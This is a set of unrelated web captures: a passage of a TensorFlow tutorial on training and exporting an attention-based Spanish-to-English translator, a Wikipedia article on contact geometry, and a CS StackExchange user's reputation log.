inputs): return self._train_step(inputs) TrainTranslator._tf_train_step = _tf_train_step translator.use_tf_function = True The first call will be slow, because it traces the function. translator.train_step([example_input_batch, example_target_batch]) 2021-08-31 11:08:27.919851: E tensorflow/core/grappler/optimizers/meta_optimizer.cc:801] function_optimizer failed: Invalid argument: Input 6 of node gradient_tape/while/while_grad/body/_531/gradient_tape/while/gradients/while/decoder_1/gru_3/PartitionedCall_grad/PartitionedCall was passed variant from gradient_tape/while/while_grad/body/_531/gradient_tape/while/gradients/while/decoder_1/gru_3/PartitionedCall_grad/TensorListPopBack_2:1 incompatible with expected float.
2021-08-31 11:08:28.004195: E tensorflow/core/grappler/optimizers/meta_optimizer.cc:801] shape_optimizer failed: Out of range: src_output = 25, but num_outputs is only 25 2021-08-31 11:08:28.044145: E tensorflow/core/grappler/optimizers/meta_optimizer.cc:801] layout failed: Out of range: src_output = 25, but num_outputs is only 25 2021-08-31 11:08:28.227653: E tensorflow/core/grappler/optimizers/meta_optimizer.cc:801] shape_optimizer failed: Out of range: src_output = 25, but num_outputs is only 25 2021-08-31 11:08:28.301920: W tensorflow/core/common_runtime/process_function_library_runtime.cc:841] Ignoring multi-device function optimization failure: Invalid argument: Input 1 of node while/body/_1/while/TensorListPushBack_56 was passed float from while/body/_1/while/decoder_1/gru_3/PartitionedCall:6 incompatible with expected variant. {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=4.0628138>} But after that it's usually 2-3x faster than the eager train_step method: %%time for n in range(10): print(translator.train_step([example_input_batch, example_target_batch])) print() {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=4.049926>} {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=4.0373826>} {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=3.9870682>} {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=3.885584>} {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=3.812589>} {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=3.7273908>} {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=3.6570778>} {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=3.6586785>} {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=3.598234>} {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=3.5944993>} CPU times: user 5.26 s, sys: 1.16 s, total: 6.42 s Wall time: 2.04 s A good test of a new model is to see that it can overfit a single batch of input. Try it, the loss should quickly go to zero: losses = [] for n in range(100): print('.', end='') logs = translator.train_step([example_input_batch, example_target_batch]) losses.append(logs['batch_loss'].numpy()) print() plt.plot(losses) .................................................................................................... [<matplotlib.lines.Line2D at 0x7fc2b90582d0>] Now that you're confident that the training step is working, build a fresh copy of the model to train from scratch: train_translator = TrainTranslator( embedding_dim, units, input_text_processor=input_text_processor, output_text_processor=output_text_processor) # Configure the loss and optimizer train_translator.compile( optimizer=tf.optimizers.Adam(), loss=MaskedLoss(), ) ### Train the model While there's nothing wrong with writing your own custom training loop, implementing the Model.train_step method, as in the previous section, allows you to run Model.fit and avoid rewriting all that boilerplate code.
This tutorial only trains for a couple of epochs, so use a callbacks.Callback to collect the history of batch losses, for plotting: class BatchLogs(tf.keras.callbacks.Callback): def __init__(self, key): self.key = key self.logs = [] def on_train_batch_end(self, n, logs): self.logs.append(logs[self.key]) batch_loss = BatchLogs('batch_loss') train_translator.fit(dataset, epochs=3, callbacks=[batch_loss]) Epoch 1/3 2021-08-31 11:08:55.515851: E tensorflow/core/grappler/optimizers/meta_optimizer.cc:801] shape_optimizer failed: Out of range: src_output = 25, but num_outputs is only 25 2021-08-31 11:08:55.556380: E tensorflow/core/grappler/optimizers/meta_optimizer.cc:801] layout failed: Out of range: src_output = 25, but num_outputs is only 25 2021-08-31 11:08:55.729119: E tensorflow/core/grappler/optimizers/meta_optimizer.cc:801] shape_optimizer failed: Out of range: src_output = 25, but num_outputs is only 25 2021-08-31 11:08:55.802715: W tensorflow/core/common_runtime/process_function_library_runtime.cc:841] Ignoring multi-device function optimization failure: Invalid argument: Input 1 of node StatefulPartitionedCall/while/body/_59/while/TensorListPushBack_56 was passed float from StatefulPartitionedCall/while/body/_59/while/decoder_2/gru_5/PartitionedCall:6 incompatible with expected variant. 1859/1859 [==============================] - 353s 187ms/step - batch_loss: 2.0502 Epoch 2/3 1859/1859 [==============================] - 333s 179ms/step - batch_loss: 1.0388 Epoch 3/3 1859/1859 [==============================] - 323s 174ms/step - batch_loss: 0.8104 <keras.callbacks.History at 0x7fc2ccb315d0> plt.plot(batch_loss.logs) plt.ylim([0, 3]) plt.xlabel('Batch #') plt.ylabel('CE/token') Text(0, 0.5, 'CE/token') The visible jumps in the plot are at the epoch boundaries. ## Translate Now that the model is trained, implement a function to execute the full text => text translation. For this the model needs to invert the text => token IDs mapping provided by the output_text_processor. It also needs to know the IDs for special tokens. This is all implemented in the constructor for the new class. The implementation of the actual translate method will follow. Overall this is similar to the training loop, except that the input to the decoder at each time step is a sample from the decoder's last prediction. class Translator(tf.Module): def __init__(self, encoder, decoder, input_text_processor, output_text_processor): self.encoder = encoder self.decoder = decoder self.input_text_processor = input_text_processor self.output_text_processor = output_text_processor self.output_token_string_from_index = ( tf.keras.layers.experimental.preprocessing.StringLookup( vocabulary=output_text_processor.get_vocabulary(), invert=True)) # The output should never generate padding, unknown, or start. index_from_string = tf.keras.layers.experimental.preprocessing.StringLookup( vocabulary=output_text_processor.get_vocabulary(), mask_token='') self.start_token = index_from_string(tf.constant('[START]')) self.end_token = index_from_string(tf.constant('[END]')) translator = Translator( encoder=train_translator.encoder, decoder=train_translator.decoder, input_text_processor=input_text_processor, output_text_processor=output_text_processor, ) ### Convert token IDs to text The first method to implement is tokens_to_text which converts from token IDs to human readable text.
def tokens_to_text(self, result_tokens): shape_checker = ShapeChecker() shape_checker(result_tokens, ('batch', 't')) result_text_tokens = self.output_token_string_from_index(result_tokens) shape_checker(result_text_tokens, ('batch', 't')) result_text = tf.strings.reduce_join(result_text_tokens, axis=1, separator=' ') shape_checker(result_text, ('batch',)) result_text = tf.strings.strip(result_text) shape_checker(result_text, ('batch',)) return result_text Translator.tokens_to_text = tokens_to_text Input some random token IDs and see what it generates: example_output_tokens = tf.random.uniform( shape=[5, 2], minval=0, dtype=tf.int64, maxval=output_text_processor.vocabulary_size()) translator.tokens_to_text(example_output_tokens).numpy() array([b'divorce nodded', b'lid discovery', b'exhibition slam', b'unknown jackson', b'harmful excited'], dtype=object) ### Sample from the decoder's predictions This function takes the decoder's logit outputs and samples token IDs from that distribution: def sample(self, logits, temperature): shape_checker = ShapeChecker() # 't' is usually 1 here. shape_checker(logits, ('batch', 't', 'vocab')) # Set the logits for all masked tokens to -inf, so they are never chosen. if temperature == 0.0: new_tokens = tf.argmax(logits, axis=-1) else: logits = tf.squeeze(logits, axis=1) new_tokens = tf.random.categorical(logits/temperature, num_samples=1) shape_checker(new_tokens, ('batch', 't')) return new_tokens Translator.sample = sample Test run this function on some random inputs: example_logits = tf.random.normal([5, 1, output_text_processor.vocabulary_size()]) example_output_tokens = translator.sample(example_logits, temperature=1.0) example_output_tokens <tf.Tensor: shape=(5, 1), dtype=int64, numpy= array([[3310], [4574], [4746], [4916], [1352]])> ### Implement the translation loop Here is a complete implementation of the text to text translation loop. This implementation collects the results into python lists, before using tf.concat to join them into tensors. This implementation statically unrolls the graph out to max_length iterations. This is okay with eager execution in python. def translate_unrolled(self, input_text, *, max_length=50, return_attention=True, temperature=1.0): batch_size = tf.shape(input_text)[0] input_tokens = self.input_text_processor(input_text) enc_output, enc_state = self.encoder(input_tokens) dec_state = enc_state new_tokens = tf.fill([batch_size, 1], self.start_token) result_tokens = [] attention = [] done = tf.zeros([batch_size, 1], dtype=tf.bool) for _ in range(max_length): dec_input = DecoderInput(new_tokens=new_tokens, enc_output=enc_output, mask=(input_tokens != 0)) dec_result, dec_state = self.decoder(dec_input, state=dec_state) attention.append(dec_result.attention_weights) new_tokens = self.sample(dec_result.logits, temperature) # If a sequence produces an end_token, set it done done = done | (new_tokens == self.end_token) # Once a sequence is done it only produces 0-padding. new_tokens = tf.where(done, tf.constant(0, dtype=tf.int64), new_tokens) # Collect the generated tokens result_tokens.append(new_tokens) if tf.executing_eagerly() and tf.reduce_all(done): break # Convert the list of generated token IDs to a list of strings.
result_tokens = tf.concat(result_tokens, axis=-1) result_text = self.tokens_to_text(result_tokens) if return_attention: attention_stack = tf.concat(attention, axis=1) return {'text': result_text, 'attention': attention_stack} else: return {'text': result_text} Translator.translate = translate_unrolled Run it on a simple input: %%time input_text = tf.constant([ 'hace mucho frio aqui.', # "It's really cold here." 'Esta es mi vida.', # "This is my life."" ]) result = translator.translate( input_text = input_text) print(result['text'][0].numpy().decode()) print(result['text'][1].numpy().decode()) print() it is very cold here . heres my life . CPU times: user 143 ms, sys: 0 ns, total: 143 ms Wall time: 138 ms If you want to export this model you'll need to wrap this method in a tf.function. This basic implementation has a few issues if you try to do that: 1. The resulting graphs are very large and take a few seconds to build, save or load. 2. You can't break from a statically unrolled loop, so it will always run max_length iterations, even if all the outputs are done. But even then it's marginally faster than eager execution. @tf.function(input_signature=[tf.TensorSpec(dtype=tf.string, shape=[None])]) def tf_translate(self, input_text): return self.translate(input_text) Translator.tf_translate = tf_translate Run the tf.function once to compile it: %%time result = translator.tf_translate( input_text = input_text) CPU times: user 15.8 s, sys: 0 ns, total: 15.8 s Wall time: 15.7 s %%time result = translator.tf_translate( input_text = input_text) print(result['text'][0].numpy().decode()) print(result['text'][1].numpy().decode()) print() its awfully cold here . this is my life . CPU times: user 135 ms, sys: 0 ns, total: 135 ms Wall time: 67.9 ms ### [Optional] Use a symbolic loop Translator.translate = translate_symbolic The initial implementation used python lists to collect the outputs. This uses tf.range as the loop iterator, allowing tf.autograph to convert the loop. The biggest change in this implementation is the use of tf.TensorArray instead of python list to accumulate tensors. tf.TensorArray is required to collect a variable number of tensors in graph mode. With eager execution this implementation performs on par with the original: %%time result = translator.translate( input_text = input_text) print(result['text'][0].numpy().decode()) print(result['text'][1].numpy().decode()) print() it is very cold here . youre my life . CPU times: user 164 ms, sys: 0 ns, total: 164 ms Wall time: 157 ms But when you wrap it in a tf.function you'll notice two differences. @tf.function(input_signature=[tf.TensorSpec(dtype=tf.string, shape=[None])]) def tf_translate(self, input_text): return self.translate(input_text) Translator.tf_translate = tf_translate First: Graph creation is much faster (~10x), since it doesn't create max_iterations copies of the model. %%time result = translator.tf_translate( input_text = input_text) CPU times: user 1.77 s, sys: 0 ns, total: 1.77 s Wall time: 1.74 s Second: The compiled function is much faster on small inputs (5x on this example), because it can break out of the loop. %%time result = translator.tf_translate( input_text = input_text) print(result['text'][0].numpy().decode()) print(result['text'][1].numpy().decode()) print() its very cold here . this is my life . 
CPU times: user 38 ms, sys: 0 ns, total: 38 ms Wall time: 15.3 ms ### Visualize the process The attention weights returned by the translate method show where the model was "looking" when it generated each output token. So the sum of the attention over the input should return all ones: a = result['attention'][0] print(np.sum(a, axis=-1)) [1. 0.99999994 1. 0.99999994 1.0000001 0.99999994] Here is the attention distribution for the first output step of the first example. Note how the attention is now much more focused than it was for the untrained model: _ = plt.bar(range(len(a[0, :])), a[0, :]) Since there is some rough alignment between the input and output words, you expect the attention to be focused near the diagonal: plt.imshow(np.array(a), vmin=0.0) <matplotlib.image.AxesImage at 0x7fc2b9590050> Here is some code to make a better attention plot: ### Labeled attention plots i=0 plot_attention(result['attention'][i], input_text[i], result['text'][i]) /home/kbuilder/.local/lib/python3.7/site-packages/ipykernel_launcher.py:14: UserWarning: FixedFormatter should only be used together with FixedLocator /home/kbuilder/.local/lib/python3.7/site-packages/ipykernel_launcher.py:15: UserWarning: FixedFormatter should only be used together with FixedLocator from ipykernel import kernelapp as app Translate a few more sentences and plot them: %%time three_input_text = tf.constant([ # This is my life. 'Esta es mi vida.', # Are they still home? '¿Todavía están en casa?', # Try to find out.' 'Tratar de descubrir.', ]) result = translator.tf_translate(three_input_text) for tr in result['text']: print(tr.numpy().decode()) print() this is my life . are theyre home yet ? we tried to find out . CPU times: user 31.2 ms, sys: 61.3 ms, total: 92.5 ms Wall time: 21.3 ms result['text'] <tf.Tensor: shape=(3,), dtype=string, numpy= array([b'this is my life .', b'are theyre home yet ?', b'we tried to find out .'], dtype=object)> i = 0 plot_attention(result['attention'][i], three_input_text[i], result['text'][i]) /home/kbuilder/.local/lib/python3.7/site-packages/ipykernel_launcher.py:14: UserWarning: FixedFormatter should only be used together with FixedLocator /home/kbuilder/.local/lib/python3.7/site-packages/ipykernel_launcher.py:15: UserWarning: FixedFormatter should only be used together with FixedLocator from ipykernel import kernelapp as app i = 1 plot_attention(result['attention'][i], three_input_text[i], result['text'][i]) /home/kbuilder/.local/lib/python3.7/site-packages/ipykernel_launcher.py:14: UserWarning: FixedFormatter should only be used together with FixedLocator /home/kbuilder/.local/lib/python3.7/site-packages/ipykernel_launcher.py:15: UserWarning: FixedFormatter should only be used together with FixedLocator from ipykernel import kernelapp as app i = 2 plot_attention(result['attention'][i], three_input_text[i], result['text'][i]) /home/kbuilder/.local/lib/python3.7/site-packages/ipykernel_launcher.py:14: UserWarning: FixedFormatter should only be used together with FixedLocator /home/kbuilder/.local/lib/python3.7/site-packages/ipykernel_launcher.py:15: UserWarning: FixedFormatter should only be used together with FixedLocator from ipykernel import kernelapp as app The short sentences often work well, but if the input is too long the model literally loses focus and stops providing reasonable predictions. There are two main reasons for this: 1. The model was trained with teacher-forcing feeding the correct token at each step, regardless of the model's predictions. 
The model could be made more robust if it were sometimes fed its own predictions. 2. The model only has access to its previous output through the RNN state. If the RNN state gets corrupted, there's no way for the model to recover. Transformers solve this by using self-attention in the encoder and decoder. long_input_text = tf.constant([inp[-1]]) import textwrap print('Expected output:\n', '\n'.join(textwrap.wrap(targ[-1]))) Expected output: If you want to sound like a native speaker, you must be willing to practice saying the same sentence over and over in the same way that banjo players practice the same phrase over and over until they can play it correctly and at the desired tempo. result = translator.tf_translate(long_input_text) i = 0 plot_attention(result['attention'][i], long_input_text[i], result['text'][i]) _ = plt.suptitle('This never works') /home/kbuilder/.local/lib/python3.7/site-packages/ipykernel_launcher.py:14: UserWarning: FixedFormatter should only be used together with FixedLocator /home/kbuilder/.local/lib/python3.7/site-packages/ipykernel_launcher.py:15: UserWarning: FixedFormatter should only be used together with FixedLocator from ipykernel import kernelapp as app ## Export Once you have a model you're satisfied with you might want to export it as a tf.saved_model for use outside of the Python program that created it. Since the model is a subclass of tf.Module (through keras.Model), and all the functionality for export is compiled in a tf.function the model should export cleanly with tf.saved_model.save: Now that the function has been traced it can be exported using saved_model.save: tf.saved_model.save(translator, 'translator', signatures={'serving_default': translator.tf_translate}) 2021-08-31 11:26:03.315521: W tensorflow/python/util/util.cc:348] Sets are not currently considered sequences, but this may change in the future, so consider avoiding using them. WARNING:absl:Found untraced functions such as encoder_2_layer_call_and_return_conditional_losses, encoder_2_layer_call_fn, decoder_2_layer_call_and_return_conditional_losses, decoder_2_layer_call_fn, embedding_4_layer_call_and_return_conditional_losses while saving (showing 5 of 60). These functions will not be directly callable after loading. INFO:tensorflow:Assets written to: translator/assets INFO:tensorflow:Assets written to: translator/assets reloaded = tf.saved_model.load('translator') %%time result = reloaded.tf_translate(three_input_text) for tr in result['text']: print(tr.numpy().decode()) print() this is my life . are you still home ? try to figure out ahead . CPU times: user 43.6 ms, sys: 140 µs, total: 43.8 ms Wall time: 16.6 ms ## Next steps
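Two helper definitions referenced earlier did not survive in this copy: plot_attention, used in the "Labeled attention plots" and "Visualize the process" sections, and translate_symbolic, assigned in the "[Optional] Use a symbolic loop" section. The sketches below are reconstructions based only on how they are called here (argument order, the FixedFormatter warnings, and the tf.range/tf.TensorArray description), not necessarily the tutorial's exact code.

A possible plot_attention, assuming the attention matrix is indexed as [output position, input position]:

def plot_attention(attention, sentence, predicted_sentence):
  # Tokenize the input the same way the model does, so labels line up with the columns.
  sentence = tf_lower_and_split_punct(sentence).numpy().decode().split()
  predicted_sentence = predicted_sentence.numpy().decode().split() + ['[END]']
  fig = plt.figure(figsize=(10, 10))
  ax = fig.add_subplot(1, 1, 1)
  # Trim the attention map to the actual sentence lengths.
  attention = attention[:len(predicted_sentence), :len(sentence)]
  ax.matshow(np.array(attention), cmap='viridis', vmin=0.0)
  fontdict = {'fontsize': 14}
  # Setting tick labels directly is what triggers the FixedFormatter warnings seen above.
  ax.set_xticklabels([''] + sentence, fontdict=fontdict, rotation=90)
  ax.set_yticklabels([''] + predicted_sentence, fontdict=fontdict)
  ax.xaxis.set_major_locator(ticker.MultipleLocator(1))
  ax.yaxis.set_major_locator(ticker.MultipleLocator(1))
  ax.set_xlabel('Input text')
  ax.set_ylabel('Output text')

A possible translate_symbolic, mirroring translate_unrolled but accumulating into tf.TensorArray objects inside a tf.range loop so autograph can convert it:

def translate_symbolic(self, input_text, *, max_length=50, return_attention=True, temperature=1.0):
  batch_size = tf.shape(input_text)[0]
  input_tokens = self.input_text_processor(input_text)
  enc_output, enc_state = self.encoder(input_tokens)
  dec_state = enc_state
  new_tokens = tf.fill([batch_size, 1], self.start_token)
  # TensorArrays collect a variable number of tensors in graph mode.
  result_tokens = tf.TensorArray(tf.int64, size=1, dynamic_size=True)
  attention = tf.TensorArray(tf.float32, size=1, dynamic_size=True)
  done = tf.zeros([batch_size, 1], dtype=tf.bool)
  for t in tf.range(max_length):
    dec_input = DecoderInput(new_tokens=new_tokens,
                             enc_output=enc_output,
                             mask=(input_tokens != 0))
    dec_result, dec_state = self.decoder(dec_input, state=dec_state)
    attention = attention.write(t, dec_result.attention_weights)
    new_tokens = self.sample(dec_result.logits, temperature)
    # Once a sequence produces an end_token it only produces 0-padding.
    done = done | (new_tokens == self.end_token)
    new_tokens = tf.where(done, tf.constant(0, dtype=tf.int64), new_tokens)
    result_tokens = result_tokens.write(t, new_tokens)
    if tf.reduce_all(done):
      break
  # Stack along the time axis and put batch first: (batch, t).
  result_tokens = tf.transpose(tf.squeeze(result_tokens.stack(), -1), [1, 0])
  result_text = self.tokens_to_text(result_tokens)
  if return_attention:
    # (t, batch, 1, s) -> (batch, t, s)
    attention_stack = tf.transpose(tf.squeeze(attention.stack(), 2), [1, 0, 2])
    return {'text': result_text, 'attention': attention_stack}
  return {'text': result_text}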
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.26789844036102295, "perplexity": 19564.3832327949}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780057303.94/warc/CC-MAIN-20210922011746-20210922041746-00432.warc.gz"}
http://en.wikipedia.org/wiki/Contact_geometry
Contact geometry Contact form redirects here. For a web email form, see Form_(web)#Form-to-email_scripts. The standard contact structure on R3. Each point in R3 has a plane associated to it by the contact structure, in this case as the kernel of the one-form dz − y dx. These planes appear to twist along the y-axis. In mathematics, contact geometry is the study of a geometric structure on smooth manifolds given by a hyperplane distribution in the tangent bundle and specified by a one-form, both of which satisfy a 'maximum non-degeneracy' condition called 'complete non-integrability'. From the Frobenius theorem, one recognizes the condition as the opposite of the condition that the distribution be determined by a codimension one foliation on the manifold ('complete integrability'). Contact geometry is in many ways an odd-dimensional counterpart of symplectic geometry, which belongs to the even-dimensional world. Both contact and symplectic geometry are motivated by the mathematical formalism of classical mechanics, where one can consider either the even-dimensional phase space of a mechanical system or the odd-dimensional extended phase space that includes the time variable. Applications Contact geometry has — as does symplectic geometry — broad applications in physics, e.g. geometrical optics, classical mechanics, thermodynamics, geometric quantization, and applied mathematics such as control theory. Contact geometry also has applications to low-dimensional topology; for example, it has been used by Kronheimer and Mrowka to prove the property P conjecture and by Yakov Eliashberg to derive a topological characterization of Stein manifolds. Contact forms and structures Given an n-dimensional smooth manifold M, and a point p ∈ M, a contact element of M with contact point p is an (n − 1)-dimensional linear subspace of the tangent space to M at p.[1][2] A contact element can be given by the zeros of a 1-form on the tangent space to M at p. However, if a contact element is given by the zeros of a 1-form ω, then it will also be given by the zeros of λω where λ ≠ 0. Thus, { λω : λ ≠ 0 } all give the same contact element. It follows that the space of all contact elements of M can be identified with a quotient of the cotangent bundle T*M,[1] namely: $\text{PT}^*M = \text{T}^*M /\! \sim \ \text{ where, for } \omega_i \in \text{T}^*_pM, \ \ \omega_1 \sim \omega_2 \ \iff \ \exists \ \lambda \neq 0 \ : \ \omega_1 = \lambda\omega_2.$ A contact structure on an odd dimensional manifold M, of dimension 2k+1, is a smooth distribution of contact elements, denoted by ξ, which is generic at each point.[1][2] The genericity condition is that ξ is non-integrable. Assume that we have a smooth distribution of contact elements, ξ, given locally by a differential 1-form α; i.e. a smooth section of the cotangent bundle. The non-integrability condition can be given explicitly as:[1] $\alpha \wedge (\text{d}\alpha)^k \neq 0 \ \text{where} \ (\text{d}\alpha)^k = \underbrace {\text{d}\alpha \wedge \ldots \wedge \text{d}\alpha}_{k-\text{times}}.$ Notice that if ξ is given by the differential 1-form α, then the same distribution is given locally by β = ƒ⋅α, where ƒ is a non-zero smooth function. If ξ is co-orientable then α is defined globally. Properties It follows from the Frobenius theorem on integrability that the contact field ξ is completely nonintegrable. This property of the contact field is roughly the opposite of being a field formed by the tangent planes to a family of nonoverlapping hypersurfaces in M.
In particular, you cannot find a piece of a hypersurface tangent to ξ on an open set of M. More precisely, the maximal dimension of an integral submanifold of ξ is n. Relation with symplectic structures A consequence of the definition is that the restriction of the 2-form ω = dα to a hyperplane in ξ is a nondegenerate 2-form. This construction provides any contact manifold M with a natural symplectic bundle of rank one smaller than the dimension of M. Note that a symplectic vector space is always even-dimensional, while contact manifolds need to be odd-dimensional. The cotangent bundle T*N of any n-dimensional manifold N is itself a manifold (of dimension 2n) and supports naturally an exact symplectic structure ω = dλ. (This 1-form λ is sometimes called the Liouville form). There are several ways to construct an associated contact manifold, one of dimension 2n − 1, one of dimension 2n + 1. Projectivization Let M be the projectivization of the cotangent bundle of N: thus M is a fiber bundle over N whose fiber at a point x is the space of lines in T*N, or, equivalently, the space of hyperplanes in TN. The 1-form λ does not descend to a genuine 1-form on M. However, it is homogeneous of degree 1, and so it defines a 1-form with values in the line bundle O(1), which is the dual of the fibrewise tautological line bundle of M. The kernel of this 1-form defines a contact distribution. Energy surfaces Suppose that H is a smooth function on T*N, that E is a regular value for H, so that the level set $L=\{(q,p)\in T^*N|H(q,p)=E\}$ is a smooth submanifold of codimension 1. A vector field Y is called an Euler (or Liouville) vector field if it is transverse to L and conformally symplectic, meaning that the Lie derivative of dλ with respect to Y is a multiple of dλ in a neighborhood of L. Then the restriction of $i_Yd\lambda$ to L is a contact form on L. This construction originates in Hamiltonian mechanics, where H is a Hamiltonian of a mechanical system with the configuration space N and the phase space T*N, and E is the value of the energy. The unit cotangent bundle Choose a Riemannian metric on the manifold N and let H be the associated kinetic energy. Then the level set H = 1/2 is the unit cotangent bundle of N, a smooth manifold of dimension 2n − 1 fibering over N with fibers being spheres. Then the Liouville form restricted to the unit cotangent bundle is a contact structure. This corresponds to a special case of the second construction, where the flow of the Euler vector field Y corresponds to linear scaling of momenta p's, leaving the q's fixed. The vector field R, defined by the equalities λ(R) = 1 and dλ(R, A) = 0 for all vector fields A, is called the Reeb vector field, and it generates the geodesic flow of the Riemannian metric. More precisely, using the Riemannian metric, one can identify each point of the cotangent bundle of N with a point of the tangent bundle of N, and then the value of R at that point of the (unit) cotangent bundle is the corresponding (unit) vector parallel to N. First jet bundle On the other hand, one can build a contact manifold M of dimension 2n + 1 by considering the first jet bundle of the real valued functions on N. This bundle is isomorphic to T*N×R using the exterior derivative of a function. With coordinates (x, t), M has a contact structure α = dt + λ. Conversely, given any contact manifold M, the product M×R has a natural structure of a symplectic manifold.
If α is a contact form on M, then ω = d(e^t α) is a symplectic form on M×R, where t denotes the variable in the R-direction. This new manifold is called the symplectization (sometimes symplectification in the literature) of the contact manifold M. Examples As a prime example, consider R3, endowed with coordinates (x,y,z) and the one-form dz − y dx. The contact plane ξ at a point (x,y,z) is spanned by the vectors X1 = ∂/∂y and X2 = ∂/∂x + y ∂/∂z. By replacing the single variables x and y with the multivariables x1, ..., xn, y1, ..., yn, one can generalize this example to any R2n+1. By a theorem of Darboux, every contact structure on a manifold looks locally like this particular contact structure on the (2n + 1)-dimensional vector space. An important class of contact manifolds is formed by Sasakian manifolds. Legendrian submanifolds and knots The most interesting subspaces of a contact manifold are its Legendrian submanifolds. The non-integrability of the contact hyperplane field on a (2n + 1)-dimensional manifold means that no 2n-dimensional submanifold has it as its tangent bundle, even locally. However, it is in general possible to find n-dimensional (embedded or immersed) submanifolds whose tangent spaces lie inside the contact field. Legendrian submanifolds are analogous to Lagrangian submanifolds of symplectic manifolds. There is a precise relation: the lift of a Legendrian submanifold in a symplectization of a contact manifold is a Lagrangian submanifold. The simplest example of Legendrian submanifolds are Legendrian knots inside a contact three-manifold. Inequivalent Legendrian knots may be equivalent as smooth knots. Legendrian submanifolds are very rigid objects; typically there are infinitely many Legendrian isotopy classes of embeddings which are all smoothly isotopic. Symplectic field theory provides invariants of Legendrian submanifolds called relative contact homology that can sometimes distinguish distinct Legendrian submanifolds that are topologically identical. Reeb vector field If α is a contact form for a given contact structure, the Reeb vector field R can be defined as the unique element of the kernel of dα such that α(R) = 1. Its dynamics can be used to study the structure of the contact manifold or even the underlying manifold using techniques of Floer homology such as symplectic field theory and embedded contact homology. Some historical remarks The roots of contact geometry appear in work of Christiaan Huygens, Isaac Barrow and Isaac Newton. The theory of contact transformations (i.e. transformations preserving a contact structure) was developed by Sophus Lie, with the dual aims of studying differential equations (e.g. the Legendre transformation or canonical transformation) and describing the 'change of space element', familiar from projective duality. References 1. ^ a b c d Arnold, V. I. (1989), Mathematical Methods of Classical Mechanics, Springer, pp. 349 − 370, ISBN 0-387-96890-3 2. ^ a b Arnold, V. I. (1989). "Contact Geometry and Wave Propagation". Monographie de L'Enseignement Mathématique. Conférences de l'Union Mathématique Internationale (in English) (Univ. de Genève). Applications to differential equations • V. I. Arnold, Geometrical Methods In The Theory Of Ordinary Differential Equations, Springer-Verlag (1988), ISBN 0-387-96649-8 Contact three-manifolds and Legendrian knots • William Thurston, Three-Dimensional Geometry and Topology. Princeton University Press (1997), ISBN 0-691-08304-5 Information on the history of contact geometry • Lutz, R.
Quelques remarques historiques et prospectives sur la géométrie de contact , Conf. on Diff. Geom. and Top. (Sardinia, 1988) Rend. Fac. Sci. Univ. Cagliari 58 (1988), suppl., 361–393. • Geiges, H. A Brief History of Contact Geometry and Topology, Expo. Math. 19 (2001), 25–53. • Arnold, V.I. (trans. E. Primrose), Huygens and Barrow, Newton and Hooke: pioneers in mathematical analysis and catastrophe theory from evolvents to quasicrystals. Birkhauser Verlag, 1990. • Contact geometry Theme on arxiv.org
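A quick check of the prime example above (added here as a sketch; it is not part of the original article): for the standard form on R3 one can verify the contact condition directly,

$\alpha = dz - y\,dx, \qquad d\alpha = dx \wedge dy, \qquad \alpha \wedge d\alpha = (dz - y\,dx) \wedge dx \wedge dy = dz \wedge dx \wedge dy \neq 0,$

so α ∧ dα is a volume form on R3 and ker α is indeed maximally non-integrable.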
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 4, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8535981774330139, "perplexity": 574.7860943089769}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-41/segments/1410657136494.66/warc/CC-MAIN-20140914011216-00182-ip-10-234-18-248.ec2.internal.warc.gz"}
https://cs.stackexchange.com/users/23949/alta%C3%AFr?tab=reputation
Altaïr
49 Reputation

Feb 25 '18 (10)
+10 00:10 upvote: Is emptiness of the intersection of the languages of two TMs decidable?

Dec 15 '14 (22)
+12 01:18 (2 events): Is emptiness of the intersection of the languages of two TMs decidable?
+10 / -2 22:55 (2 events): Give an example of a non-regular language $L$ such that $L^*$ is regular
+2 22:50 accept: Give an example of a non-regular language $L$ such that $L^*$ is regular

Dec 14 '14 (12)
+10 / -2 16:14 (2 events): Let $L_4$ $\subseteq$ {0,1}$^*$ be the set of all palindromes whose first character is 1. Give a context-free grammar for $L_4$
+2 20:39 accept: Let $L_4$ $\subseteq$ {0,1}$^*$ be the set of all palindromes whose first character is 1. Give a context-free grammar for $L_4$
